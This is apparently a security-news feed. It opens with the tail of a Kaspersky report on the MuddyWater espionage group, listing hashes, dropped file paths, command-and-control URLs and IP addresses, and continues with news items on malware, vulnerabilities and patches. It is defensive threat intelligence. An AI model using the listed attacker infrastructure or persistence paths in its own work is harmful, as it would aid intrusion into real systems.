The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

• C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.

无法连接到网址,请等待龙…
无法访问本地计算机寄存器
任务计划程序访问被拒绝

Chinese text found in PowerShell code in multiple samples

Unable to connect to the URL, please wait for the dragon…
Unable to access local computer register
Task Scheduler access denied

Translation of Chinese text

We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.

http://www.cankayasrc[.]com/style/js/main.php
http://ektamservis[.]com/includes/main.php
http://gtme[.]ae/font-awesome/css/main.php

Recommendations for organizations
Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

The best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object.
Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO.
A whitelisting solution to prevent certain process child-parent execution hierarchies.
Conclusion
The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

Educate generic staff to be able to distinguish malicious behavior like phishing links.
Educate information security staff to have full configuration, investigative and hunting abilities.
Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
Make sure enterprise-grade patch management processes are well established and executed.
High-profile organizations should have elevated levels of cybersecurity, attacks against them are inevitable and are unlikely to ever cease.

Additional information
In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Indicators of compromise
MD5
08acd1149b09bf6455c553f512b51085
a9ec30226c83ba6d7abb8d2011cdae14
E5683fb480353c0dec333a7573710748
159238b473f80272fdcd0a8ddf336a91
16ac1a2c1e1c3b49e1a3a48fb71cc74f
1b086ab28e3d6f73c6605f9ae087ad4a
23c82e8c028af5c64cbe37314732ec19
24e1bd221ba3813ed7b6056136237587
2e82e242cb0684b98a8f6f2c0e8a12f3
37f7e6e5f073508e1ee552ebea5d200e
3bb14adb551663fd2328d59f653ba757
3c2a0d6d0ecf06f1be9ad411d06f7ba8
4c5a5c236c9f4480b3d725f297673fad
4f873578956d2790101443f24e4bd4d3
5466c8a099d1d30096775b1f4357d3cf
59502e209aedf80e170e653306ca1553
5a42a712e3b3cfa1db32d9e3d832f8f1
5bd61a94e7698574eaf82ef277316463
5de97ae178888f2dd222bb8a66060ac2
665947cf7037a6772687b69279753cdf
7a2ff07283ddc69d9f34cfa0d3c936d4
7beb94f602e97785370fec2d059d54a5
801f34abbf90ac2b4fb4b6289830cd16
864d6321be50f29e7a7a4bfab746245a
8a36d91ca331f62642dbcafc2ea1b1ab
9486593e4fb5a4d440093d54a3519187
94edf251b5fe7cc19488b5f0c3c3e359
9c6648cedeb3f5d9f6d104e638bd0c3d
9f4044674100a8c28f9ed1b336c337ce
aa1e8d0e1c4d4eb9984124df003ea7f2
aa564e207926d06b8a59ba50ca2c543d
ab4f947f4649b9ec28d182b02778aa69
ad92ccf85ec170f340457d33bbb81df5
b8939fa58fad8aa1ec271f6dae0b7255
bb476622bcb0c666e12fbe4ccda8bbef
be62fc5b1576e0a8491519e10bab931d
bf310319d6ef95f69a45fc4f2d237ed4
c375bbf248592cee1a1999227457c300
c73fc71ee35e99230941f03fc32934d9
c8b0458c384fd34971875b1c753c9c7c
cd371d1d3bd7c8e2110587cfa8b7eaea
ce2df2907ce543438c19cfaf6c14f699
d15aee026074fbd18f780fb51ec0632a
d632c8444aab1b43a663401e80c0bac4
d6acee43d61cbd4bcd7a5bdf4ed9b343
e3e25957b738968befcf2333aa637d97
e5683fb480353c0dec333a7573710748
eb69fb45feb97af81c2f306564acc2da
f00fd318bf58586c29ab970132d1fd2a
f2b5373f32a4b9b3d34701ff973ba69c
f84914c30ae4e6b9b1f23d5c01e001ed
faa4469d5cd90623312c86d651f2d930
Ffb8ea0347a3af3dd2ab1b4e5a1be18a
345b1ea293764df86506f97ba498cc5e
029cb7e622f4eb0d058d577c9d322e92
06178b5181f30ce00cd55e2690f667ac
2b8ab9112e34bb910055d85ec800db3f
47ec75d3290add179ac5218d193bb9a8
befc203d7fa4c91326791a73e6d6b4da
C561e81e30316208925bfddb3cf3360a
132efd7b3bdfb591c1bf2a4e19c710eb
e7a6c57566d9523daa57fe16f52e377e
c0e35c4523a7931f4c99616d6079fd14
245fa82c89875b70c2669921d4ba14d3

File names
%SystemDrive%\ProgramData\EventManager.dll
%SystemDrive%\ProgramData\EventManager.logs
%SystemDrive%\ProgramData\WindowsDefenderService.ini
%SystemDrive%\ProgramData\Defender.sct
%SystemDrive%\ProgramData\DefenderService.inf
%SystemDrive%\ProgramData\WindowsDefender.ini
%SystemDrive%\ProgramData\ZIPSDK\InstallConfNT.vbs
%SystemDrive%\ProgramData\ZIPSDK\ProjectConfManagerNT.ini
%SystemDrive%\ProgramData\WindowsDefenderTask.ini
%SystemDrive%\ProgramData\WindowsDefenderTask.txt
%SystemDrive%\ProgramData\WindowsDefenderTask.xml
%SystemDrive%\ProgramData\DefenderNT\ConfigRegister.vbs
%SystemDrive%\ProgramData\DefenderNT\SetupConf.ini
%SystemDrive%\ProgramData\ASDKiMalwareSDK\ProjectConfSDK.vbs
%SystemDrive%\ProgramData\ASDKiMalwareSDK\SetupConfSDK.ini
%SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.ini
%SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.vbs
%SystemDrive%\ProgramData\OneDrive.dll
%SystemDrive%\ProgramData\OneDrive.html
%SystemDrive%\ProgramData\OneDrive.ini
%SystemDrive%\ProgramData\WindowsNT\WindowsNT.ini
%SystemDrive%\ProgramData\WindowsNT\WindowsNT.vbs
%SystemDrive%\ProgramData\SYSTEM32SDK\ConfManagerNT.vbs
%SystemDrive%\ProgramData\SYSTEM32SDK\ProjectConfManagerNT.ini
%windir%\System32\Tasks\Microsoft\WindowsDefenderUpdater
%windir%\System32\Tasks\Microsoft\MicrosoftOneDrive
%windir%\System32\Tasks\Microsoft\WindowsDifenderUpdate
%windir%\System32\Tasks\Microsoft\WindowsSystem32SDK
%windir%\System32\Tasks\Microsoft\WindowsDefenderSDK
%windir%\System32\Tasks\Microsoft\WindowsMalwareDefenderSDK
%windir%\System32\Tasks\Microsoft\WindowsMalwareByteSDK

Domains, URLs and IP addresses
http://www.cankayasrc[.]com/style/js/main.php
http://ektamservis[.]com/includes/main.php
http://gtme[.]ae/font-awesome/css/main.php
https://www.adfg[.]ae/wp-includes/widgets/main.php
http://adibf[.]ae/wp-includes/js/main.php
http://hubinasia[.]com/wp-includes/widgets/main.php
https://benangin[.]com/wp-includes/widgets/main.php

104.237.233.60
104.237.255.212
104.237.233.40
5.9.0.155


'Five Eyes' Agencies Release Joint Report on Hacking Tools

12.10.2018 securityweek BigBrothers

Cybersecurity agencies in the United States, United Kingdom, Canada, Australia and New Zealand have released a joint report describing five of the most commonly used hacking tools.

The report was written by experts at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

The goal of the report, its authors said, is to provide network defenders and system administrators advice on how to detect the tools and limit their effectiveness.

Five types of tools are described, including remote access trojans (RATs), web shells, lateral movement frameworks, command and control (C&C) obfuscators, and credential stealers – all of which can be used after the targeted system has been compromised.

The RAT included in the report is JBiFrost, a variant of Adwind. The Five Eyes agencies have warned that while JBiFrost has been mostly used by low-skilled threat actors and cybercriminals, it can also be useful to state-sponsored groups.

JBiFrost works on Windows, Linux, macOS and Android, and its capabilities include lateral movement, installing additional malware, launching distributed denial-of-service (DDoS) attacks, and stealing information.

Agencies warned that JBiFrost has been increasingly used in targeted attacks aimed at critical infrastructure operators and their supply chain.

The web shell mentioned in the report is called China Chopper and it allows hackers to remotely access compromised servers. Widely used since 2012, the shell is only 4Kb in size and its payload is easy to modify, which makes it more difficult to detect.

China Chopper was used in the summer of 2018 in an attack that exploited an Adobe ColdFusion vulnerability tracked as CVE-2017-3066.

Another tool described in the report is Mimikatz, a popular open source application that has been around for more than a decade. Mimikatz has been used by many threat groups to steal passwords, including in the recent NotPetya and Bad Rabbit attacks.

Cybersecurity agencies have also warned of PowerShell Empire, a lateral movement framework released in 2015 as a legitimate penetration testing tool. PowerShell Empire allows attackers to elevate privileges, harvest credentials, log keystrokes, find nearby hosts, and move laterally across the network.

The tool was used in recent years in attacks aimed at the UK energy sector, South Korean organizations as part of a Winter Olympics-themed campaign, a multinational law firm, and academia.

The last hacking tool described in the report is HUC Packet Transmitter (HTran), which allows malicious actors to obfuscate communications. Hackers have been using it to evade detection, bypass security controls, obfuscate C&C traffic, and improve their C&C infrastructure.

"These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution," the report reads. "Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives."


Juniper Patches Serious Flaws in Junos OS
12.10.2018 securityweek
Vulnerebility

Juniper Networks this week informed customers that its Junos operating system is affected by many serious vulnerabilities, including a flaw that may have been triggered during malicious network probing.

Juniper on Wednesday published nearly two dozen advisories describing security holes in Junos, the operating system that powers its networking and security products. The company has provided patches and mitigations for each of the vulnerabilities.

One of the more interesting issues is CVE-2018-0049, which allows an attacker to crash the Junos kernel by sending specially crafted MPLS packets. Juniper noted that a single packet can cause a denial-of-service (DoS) condition, but an attacker can launch a sustained DoS attack by continually sending malicious packets.

Juniper says that while it's not aware of instances where this vulnerability was specifically targeted by hackers, the company is aware of "possible malicious network probing which may have triggered this issue."

Juniper has assigned a "critical" risk level to several vulnerabilities affecting the NTP daemon. The Network Time Foundation recently patched several vulnerabilities, including ones rated "critical" and "high severity," and Juniper has now rolled out the fixes to its customers with Junos OS updates.

Juniper NFX series devices are affected by a critical flaw that can allow a remote attacker to gain access to the system through accounts with blank passwords. The company addressed the issue by not allowing empty passwords.

The list of Junos vulnerabilities that are close to critical – with a CVSS score of 8.8 – includes two vulnerabilities that can be exploited to crash the routing protocol daemon (RPD) and possibly for remote code execution.

Juniper has also disclosed the existence of several other severe RPD-related vulnerabilities that can be exploited to cause a DoS condition.

An update for the Junos Space Network Management Platform fixes several vulnerabilities, including ones considered "high risk."

Another serious DoS vulnerability has been found in the SIP application layer gateway (ALG) in Junos, which allows an attacker to crash various processes.

A "high risk" rating has also been assigned to a vulnerability in the RSH service that allows a remote and unauthenticated attacker to gain root access to affected devices.

A dozen of the advisories published this week by Juniper describe "medium risk" flaws that can be exploited for DoS and cross-site scripting (XSS) attacks.


Mozilla Delays Distrust of Symantec Certificates
12.10.2018 securityweek
Security

Mozilla this week announced that the distrust of older Symantec certificates, initially planned for Firefox 63, will be delayed.

Following a long series of problems regarding the wrongful issuance of certificates issued by the Certification Authority (CA) run by Symantec, one of the oldest and largest CAs, browser makers have decided to remove trust in all Symantec-issued certificates before the end of this year.

Both Google and Mozilla said they would gradually remove trust in all TLS/SSL certificates issed by Symantec. Google, which removed trust in certificates that Symantec issued before June 1, 2016, with the release of Chrome 66 in April, wants to remove trust in all Symantec certificates in Chrome 70.

Mozilla was aiming at making a similar move in October 2018, with the release of Firefox 63, but now says it has decided to delay the distrust plans. The browser is currently only warning users when encountering a website that uses a Symantec-issued certificate.

According to the browser maker, it took this decision after learning that well over 1% of the top 1,000,000 websites still use Symantec certificates, meaning that impact on users would be much greater than initially anticipated.

Last year, Symantec sold its CA business to DigiCert, which immediately started issuing new certificates to replace those issued by Symantec. In March, DigiCert said it had replaced most of the Symantec-issued certificates and that less than 1% of the top 1 million websites hadn’t made the switch yet.

As it turns out, many popular sites are still using Symantec certificates, apparently unaware of the planned distrust. Others, Mozilla says, are likely waiting until Chrome 70 arrives on October 23 to finally replace their Symantec certificates.

“Unfortunately, because so many sites have not yet taken action, moving this change from Firefox 63 Nightly into Beta would impact a significant number of our users. It is unfortunate that so many website operators have waited to update their certificates, especially given that DigiCert is providing replacements for free,” Mozilla’s Wayne Thayer notes.

He says that Mozilla is well aware of the additional risk caused by a delay in the implementation of the distrust plan, but also points out that the delay is in the best interest of Firefox users, given the current situation.

The distrust, however, continues to be planned for later this year, when more sites have replaced their Symantec TLS certificates. Firefox 63 Nightly is already distrusting Symantec-issued certificates, but the change won’t be implemented in Firefox 63 Beta, but Firefox 64 Beta instead.

“We continue to strongly encourage website operators to replace Symantec TLS certificates immediately. Doing so improves the security of their websites and allows the 10’s of thousands of Firefox Nightly users to access them,” Thayer concludes.


Audit Finds No Critical Flaws in Firefox Update System
12.10.2018 securityweek
Vulnerebility

An audit commissioned by Mozilla for the Firefox update system revealed no critical vulnerabilities and the flaws rated "high severity" were not easy to exploit.

Experts at Germany-based X41 spent 27 days analyzing the Firefox Application Update Service (AUS), including its update signing protocol, client code, backend and other components. The audit involved a cryptographic review, fuzzing, pentesting, and manual code analysis.

X41's audit revealed 14 vulnerabilities, including three issues that based on their CVSS score would be rated as "high severity," seven "medium" and four "low" flaws. In addition, experts discovered 21 issues that have been described by Mozilla as "side findings," which are informational.

The most serious of the security holes are related to the use of JavaScript libraries with known vulnerabilities, the lack of validation for cross-site request forgery (CSRF) tokens, and the use of cookies without the "secure" flag. All of these problems affected the backend service that manages updates, which Mozilla has dubbed Balrog.

While these flaws may have normally posed a serious risk, Mozilla pointed out that the actual risk was lowered due to AUS being protected by multiple layers of authentication inside its internal network.

The audit also uncovered some bugs in the code that handles update files, but the cryptographic signatures implemented by Mozilla prevent threat actors from creating malicious update files.

Researchers also discovered some less serious denial-of-service (DoS) bugs, memory corruption issues, and insecure handling of data, but they noted that exploitation was prevented by the need to bypass crypto signatures.

"No issues were identified in the handling of cryptographic signatures for update files," X41 wrote in its report. "There were no cryptographic signatures on the XML files describing the update files’ location and other metadata. The files were downloaded via HTTPS, but the server certificates or public keys were not pinned."

Auditors noted that the number of informational bugs was "unusually high" and warned that these should be patched as well, as some of them could turn out to be exploitable and critical.

"In conclusion, the AUS showed good resistance against the actual exploitation of vulnerabilities," X41 said.

Mozilla has already patched the serious vulnerabilities and is currently working on addressing the less severe issues and the side findings. The organization has made public the full report from X41 and opened the bug tracker where the patching progress can be monitored.

This is not the first security audit commissioned by Mozilla. Last year it hired Cure53 to analyze the Firefox Accounts system.


Security Automation Firm Demisto Raises $43 Million
12.10.2018 securityweek
IT

Security Orchestration, Automation and Response (SOAR) firm Demisto has raised $43 million in a Series C funding round led by Greylock partners. It brings the total raised by the Cupertino, California-based firm to date to $69 million, following a Series B round ($20 million) in February 2017.

The purpose of the new funding is to continue development of the SOAR product, and to help the firm expand into the EMEA and APAC markets. Sarah Guo, a general partner at Greylock, joins the Demisto board.

Demisto was founded in 2015 by Dan Sarel, Guy Rinat, Rishi Bhargava, and Slavik Markovich. They had decided that the market needed, not so much a new security control product, but a new product able to maximize use of existing products. "We asked a bunch of security executives and analysts, 'What is your biggest problem today?" Bhargava told SecurityWeek. "All of them replied that the problem is operational -- they simply do not have the staff to handle the volume of alerts generated by existing products. This is the problem we decided to solve through automation and orchestration."

SOAR is a relatively new product category -- but its value is already recognized. At the end of 2017, Gartner published a report suggesting that the share of organizations with security teams larger than five people that will leverage SOAR tools for orchestration and automation will rise from less than 1% today to 15% in 2020. A few months later, in May 2018, Gartner listed Demisto as one of its 'cool' vendors for 2018.

"It is clear," continued Bhargava, "that security teams are focused on deploying the next best technology product -- whether that's at the perimeter, or in the cloud, or on the endpoint. But few security teams focus on the operational side of security." With an increasing number of attacks, a growing number of products, and an increasing volume of alerts, analyst teams are simply overwhelmed be their workload. The result, he suggested, is that for many firms the operational side of security is in disarray.

"We decided that first of all we needed to develop a robust automation and orchestration platform that can enable workflows (whether manual or automated or a combination) to automate the analyst's response; and that the platform needs to integrate with hundreds of security products. We currently integrate with around 220 different security products. Secondly, we needed a component that would provide a very strong ticketing, or case management, system, designed to manage the workload of the security teams. This would include clear escalation and assignment processes -- and would need to tie in with the response workflow. Thirdly, we wanted a collaboration workbench able to give analysts the ability to work with their peers; because most security teams in large organizations are distributed across different locations."

The key to the Demisto platform is the playbooks. These automate a consistent method, or progression of steps, needed to handle the different types of alert generated by the security control products. "The playbooks are not built around specific threats or exploits, but on the methods of exploitation," explained Bhargava. "So, if you get a new type of threat -- say ransomware -- you need to check the malware playbook to see if it handles the new threat. If the answer is no, then you need to tweak the playbook."

Tweaking can be done in-house or remotely via Demisto. "If a customer improves a playbook, it gets shared to the rest of the Demisto community of customer analysts. The playbook is defined as content and kept separate from the product. If the product gets updated by Demisto, the playbooks remain unchanged."

What this means is that the alert handling process is not merely automated, it is continually improved -- and perhaps most pertinently, that expertise doesn't walk out the door when the analyst moves on to a different company (which is currently about every two years).

"SOAR products," suggests Roland Cloutier, Global CSO at ADP. "occupy a unique place in the security, risk, and privacy landscape because they weave an actionable and operational thread across the incident management, security, and even business process workflows. Business Protection and Assurance Data without action is incomplete, and SOAR tools fill that gap by ingesting aggregated alerts and instantiating workflows that automate security and business actions across the product stack. This frees up analyst time, investigative time, reporting time, and helps security, risk, and privacy teams leverage their existing business protection and management technology investments, ensuring their business is more prepared."

In measurable terms, Bhargava pointed to one customer (ESRI) that used the SOAR platform and reduced the alerts needing human intervention from a high of 100,000 per week, to roughly just 500 per week.


Google Hardens Android Kernel
12.10.2018 securityweek
Android

Google this week revealed that Android’s kernel is becoming more resilient to code reuse attacks, courtesy of implemented support for LLVM’s Control Flow Integrity (CFI).

CFI support, Google says, was added to Android kernel versions 4.9 and 4.14 and the feature is available to all device vendors. However, Google Pixel 3, which was launched earlier this week, is the first device to take advantage of the new security mitigations.

One of the manners in which attackers achieve code execution even without injecting executable code of their own, Google reveals, is by abusing kernel bugs to overwrite a function pointer stored in memory. The method is popular with the kernel given the large number of function pointers the latter uses and the protections that make code injection difficult.

CFI, however, was designed to mitigate these attacks through additional checks applied to the kernel's control flow. While this still allows an attacker to change a function pointer if a bug provides write access to one, it significantly restricts the valid call targets, thus making exploitation more difficult.

LLVM's solution to CFI also requires the use of Link Time Optimization (LTO), which also requires the adoption of LLVM's integrated assembler for inline assembly. The GNU toolchain, which Linux kernel relies on for assembling, compiling, and linking the kernel, will continue to be used for stand-alone assembly code.

“LLVM's CFI implementation adds a check before each indirect branch to confirm that the target address points to a valid function with a correct signature. This prevents an indirect branch from jumping to an arbitrary code location and even limits the functions that can be called,” Google explains.

Kernel modules, which are loaded at runtime and can be compiled independently from the rest of the kernel, add another complication to CFI and Google implemented LLVM's cross-DSO CFI support in the kernel, to ensure kernel modules are supported.

“When compiled with cross-DSO support, each kernel module contains information about valid local branch targets, and the kernel looks up information from the correct module based on the target address and the modules' memory layout,” Google explains.

The CFI checks add overhead to indirect branches, but aggressive optimizations result in the overall system performance getting improved even 1-2% in many cases.

CFI for arm64, Google notes, requires clang version 5.0 and higher, as well as binutils 2.27 and higher. The LLVMgold.so plug-in should also be available in LD_LIBRARY_PATH. Google has already added pre-built toolchain binaries for clang and binutils in AOSP, but says that upstream binaries can also be used.

The use of CFI comes with its own pitfalls, such as violations caused by function pointer type mismatches, which Google has encountered plenty. Address space conflicts could also arise, and CFI can also be tripped by memory corruption errors that would normally result in random kernel crashes.

“If you are shipping a new arm64 device running Android 9, we strongly recommend enabling kernel CFI to help protect against kernel vulnerabilities. LLVM's CFI protects indirect branches against attackers who manage to gain access to a function pointer stored in kernel memory. This makes a common method of exploiting the kernel more difficult,” Google says.

The tech giant also plans on protecting function return addresses from similar attacks with the help of LLVM's Shadow Call Stack. This change, however, will be available in an upcoming compiler release.


Hackers Exploit Drupalgeddon2 to Install Backdoor
12.10.2018 securityweek
Exploit

A threat actor was observed targeting Drupal vulnerabilities patched earlier this year to install a backdoor on compromised servers, IBM reports.

The hackers target CVE-2018-7600, or Drupalgeddon2, a critical vulnerability found to impact Drupal versions 6, 7 and 8, but which was addressed in March this year. Assigned a risk score of 21/25, the vulnerability could be exploited to gain full control over a site, including access to non-public data.

Within weeks after a patch was released and the vulnerability became public, the first attempts to exploit it were observed. Soon after, while cybercriminals were targeting vulnerable sites with backdoors and crypto-miners, Drupal patched another highly critical flaw related to Drupalgeddon2.

Now, IBM’s security researchers reveal that both vulnerabilities are being targeted in a series of attacks that appear to be part of a financially-motivated campaign aiming at mass-infecting vulnerable Drupal websites. Although both security bugs have been patched, delays in applying fixes make them persistent.

The researchers observed that the same HTTP POST request was being repeatedly sent from the same IP address, which then revealed similar traffic from multiple command-and-control (C&C) servers. Part of a widespread cyber-attack, the requests would download a Perl script to launch the Shellbot backdoor.

The Shellbot malware would connect to an Internet Relay Chat (IRC) channel and use it to receive instructions. The bot contains functionality to perform distributed denial-of-service (DDoS) attacks, as well as to scan for SQL injection weaknesses and other vulnerabilities, in an attempt to reach root level on the victimized system.

“The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well,” IBM notes.

Around since 2005, Shellbot was designed to open remote command line shells, launch DDoS attacks, run tasks and processes, download additional files onto the infected system, and change the endpoint’s settings, among others.

Although old, Shellbot is being used by several threat groups, and the security researchers observed it last year in attacks targeting an Apache Struts vulnerability (CVE-2017-5638) as well, when it was packaged as the C&C with the PowerBot malware, which dropped crypto-mining modules.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Facebook Purges 251 Accounts to Thwart Deception
12.10.2018 securityweek
Social

Facebook on Thursday said it shut down 251 accounts for breaking rules against spam and coordinated deceit, some of it by ad farms pretending to be forums for political debate.

The move came as the leading social network strives to prevent the platform from being used to sow division and spread misinformation ahead of US elections in November.

Facebook removed 559 pages and 251 accounts that consistently violated rules against spam and "coordinated inauthentic behavior," according to an online post by cybersecurity policy chief Nathaniel Gleicher and product manager Oscar Rodriguez.

"Many were using fake accounts or multiple accounts with the same names and posted massive amounts of content across a network of Groups and Pages to drive traffic to their websites," they said.

"Many used the same techniques to make their content appear more popular on Facebook than it really was."

Other pages and accounts shut down were "ad farms" using Facebook to trick people into thinking they were forums for legitimate political debate, according to Gleicher and Rodriguez.

Facebook is getting a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections in the US and Brazil.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

Facebook is keen to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election the brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said recently in a post on the social network.

Facebook has started showing who is behind election-related online ads, and have shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to the social network.


Exaramel Malware Links Industroyer ICS malware and NotPetya wiper
12.10.2018 securityaffairs
Ransomware

ESET researchers have spotted a new strain of malware tracked as Exaramel that links the dreaded not Petya wiper to the Industroyer ICS malware.
A few months ago, researchers from ESET discovered a new piece of malware that further demonstrates the existence of a link between Industroyer and the NotPetya wiper.

In June 2017, researchers at antivirus firm ESET discovered a new strain of malware, dubbed Industroyer, that was designed to target power grids.

Industroyer was involved in the December 2016 attack aimed at an electrical substation in Ukraine that caused significant power outages.

Industroyer is the fourth malware specifically designed to target ICS systems, threats previously discovered by security experts are Stuxnet, BlackEnergy, and Havex.

Now experts found a link between the 2016 Industroyer attack and Russia-linked APT groups tracked as BlackEnergy, TeleBots, Sandworm, and Electrum.

“That said, we have observed and documented ties between the BlackEnergy attacks – not only those against the Ukrainian power grid but against various sectors and high-value targets – and a series of campaigns (mostly) against the Ukrainian financial sector by the TeleBots group.” reads the analysis published by ESET.

“In June 2017, when many large corporations worldwide were hit by the Diskcoder.C ransomware (aka Petya and NotPetya) – most probably as unintended collateral damage – we discovered that the outbreak started spreading from companies afflicted with a TeleBots backdoor, resulting from the compromise of the popular financial software M.E.Doc.”

Telebots Industroyer Exaramel

The NotPetya Wiper was linked by experts to BlackEnergy and the KillDisk malware that was used the 2015 attack in Ukraine.

In April 2018, ESET discovered a new backdoor tracked as Exaramel that definitively links Industroyer to TeleBots.

Researchers noticed that the configuration data in XML format written by the dropper of Exaramel in the Windows registry includes the security solution used on the compromised system, something similar with Industroyer.

“the attackers are grouping their targets based on the security solutions in use. Similar behavior can be found in the Industroyer toolset – specifically some of the Industroyer backdoors were also disguised as an AV-related service (deployed under the name avtask.exe) and used the same grouping.” continues the analysis.

Experts also found many similarities in the code used for the implementation of the commands in the Exaramel malware and a backdoor from the Industroyer toolset.

Both malware relies on a report file for storing the result output of executed shell commands and launched processes.

The main difference between the backdoor from the Industroyer toolset and the Exaramel backdoor is that the latter uses XML format for communication and configuration instead of a custom binary format.

“Along with the Exaramel backdoor, Telebots group uses some of their old tools, including a password stealer (internally referred as CredRaptor or PAI by the attackers) and a slightly-modified Mimikatz.” continues the analysis.

“The CredRaptor custom password-stealer tool, exclusively used by this group since 2016, has been slightly improved. Unlike previous versions, it collects saved passwords not only from browsers, but also from Outlook and many FTP clients.”

ESET observed only one attack based on the Exaramel that targeted an organization in Ukraine, experts also discovered a Linux backdoor, racked as Linux/Exaramel.A.

“The discovery of Exaramel shows that the TeleBots group is still active in 2018 and the attackers keep improving their tools and tactics.” concludes ESET.

“The strong code similarity between the Win32/Exaramel backdoor and the Industroyer main backdoor is the first publicly presented evidence linking Industroyer to TeleBots, and hence to NotPetya and BlackEnergy. While the possibility of false flags – or a coincidental code sharing by another threat actor – should always be kept in mind when attempting attribution, in this case we consider it unlikely.”


Juniper Networks provides dozens of fix for vulnerabilities in Junos OS

12.10.2018 securityaffairs Vulnerebility

Juniper Networks has released security updates to address serious vulnerabilities affecting the Junos operating system.
This week, Juniper Networks has patched dozens of serious security provided security patches for each of them, the security advisories are available on the company website.

The most severe flaw is probably the CVE-2018-0049, which could be exploited by an attacker to crash the Junos kernel by sending specially crafted MPLS packets.

Juniper reported that a single specially crafted MPLS packet could trigger a DoS condition while sending more packets it is possible to crash the device.

“A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS allows an attacker to cause the Junos OS kernel to crash. A single packet received by the target victim will cause a Denial of Service condition. Continued receipt of this specifically crafted malicious MPLS packet will cause a sustained Denial of Service condition.” reads the security advisory.

As a possible workaround, the company suggests to Remove MPLS configuration stanza from interfaces at risk.

At the time of the provisioning of the patch, there is no news about exploitation of the flaw in the wild, anyway, Juniper is aware of “possible malicious network probing which may have triggered this issue.

Another severe flaw fixed by Juniper affecting the Juniper NFX series devices could be exploited by a remote attacker to gain access to the system by using accounts with blank passwords.

The patched provided by the company no more allow empty passwords.

Juniper also provided fixes for several vulnerabilities affecting the NTP daemon. The company addressed several flaws in RDP most of them could be exploited to cause a DoS condition.


Two issues can be exploited to crash the routing protocol daemon (RPD) and potentially allow remote code execution.

Giving a look at the list of advisories we can find a fix a high-risk vulnerability in Junos Space Network Management Platform and a DoS flaw in the SIP application layer gateway (ALG) in Junos. This latter issue could be exploited by an attacker to crash several processes.

Experts also fixed a high-risk flaw in the RSH service that could allow a remote and unauthenticated attacker to gain root access to affected devices.

The company also fixed dozen of DoS and XSS flaws rated as “medium risk.”


MuddyWater Threat Actor Expands Targets List
11.10.2018 securityweek
CyberSpy

The MuddyWater cyber-espionage campaign was observed using spear-phishing emails to target entities in more countries, Kaspersky Lab reports.

The MuddyWater threat actor was first detailed last year, focusing mainly on governmental targets in Iraq and Saudi Arabia. Attribution appears difficult and numerous new attacks were linked to the group this year.

Recently, the group was observed targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan. Other victims were detected in Mali, Austria, Russia, Iran, and Bahrain, and the initially discovered attacks on Iraq and Saudi Arabia continued as well.

